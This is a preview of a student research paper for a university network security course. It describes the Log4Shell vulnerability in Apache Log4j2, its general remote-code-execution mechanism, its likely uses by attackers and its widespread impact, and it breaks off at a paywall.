A4 Brendyn Hitt

.docx

School

Bellevue University *

*We aren’t endorsed by this school

Course

CIS311

Subject

Information Systems

Date

Oct 30, 2023

Type

docx

Pages

Uploaded by PrivateHummingbird3765

CVE-2021-44228 Apache Log4j2 (Log4Shell) Brendyn T Hitt Bellevue University CIS311-T302 Network Security Professor Nyburg 9/24/23

CVE-2021-44228 Apache Log4j2 (Log4Shell) When software or hardware has defects or weaknesses that can be exploited to breach availability, confidentiality, or integrity, this is a vulnerability. This research paper will cover what vulnerabilities are, and will detail CVE-2021-44228, a vulnerability coming from Apache Corporation, that had the potential to exploit billions of devices. Log4j – Apache Log4j Security Vulnerabilities. (2022). Logging.apache.org. Log4j is a popular logging tool used by java enthusiasts, and this Day 0 exploit had major implications. Technical Mechanism and Features Log4Shell is a vulnerability that is injected into the Java Naming and Directory Interface (JNDI), and the purpose of this vulnerability is to give access for remote code execution (RCE). Log4j uses log messages, these indicate whenever a client registers or connects a new request. An attacker could take advantage of this to attain remote code execution (RCE) over a device and essentially have the ability to control a device. Apache Log4j Vulnerability Guidance | CISA. (2021). Cybersecurity and Infrastructure Security Agency CISA . By gaining access to modify log messages through a third-party application, an infected log could be injected into the Java Naming and Directory Interface that had the ability to infect a device and gain RCE. Goal of Exploit

The goal of Log4Shell was simply to gain remote code execution, and this allowed hackers to do many things with a client's device. Denial of service (DoS) is a very common goal of achieving access over other devices, a hacker could choose to crash the infected system by overloading and exhausting its system resources, or it could use these devices to overload a target with requests until it cannot accept regular network traffic or data. Sensitive data can also be retrieved with relative ease by accessing the data on a device that is infected, this could be any sort of data like banking details or a social security number, or current location. With remote code execution, a device could unknowingly become infected by a crypto mining malware that would burn your devices resources in excess causing potential failure of hardware. Ransomware is possibly the most dangerous result of this vulnerability as hackers could “lock” a user out of their device until they are paid. Risk/Damage Potential The potential of damage for this vulnerability was astronomical, up to three billion devices that used log4j were affected, and even the FDA released a statement, as the functionality of electronic medical devices had the potential to be impacted or compromised because of this. Health, C. for D. and R. (2023). Cybersecurity. FDA . Any device with an unsecure open- source code that is connected to the infected device also has the potential to be infected. The amount of personal and sensitive data that may have been compromised because of this is devastating. This exploit was discovered on

Your preview ends here

Eager to read complete document? Join bartleby learn and gain access to the full version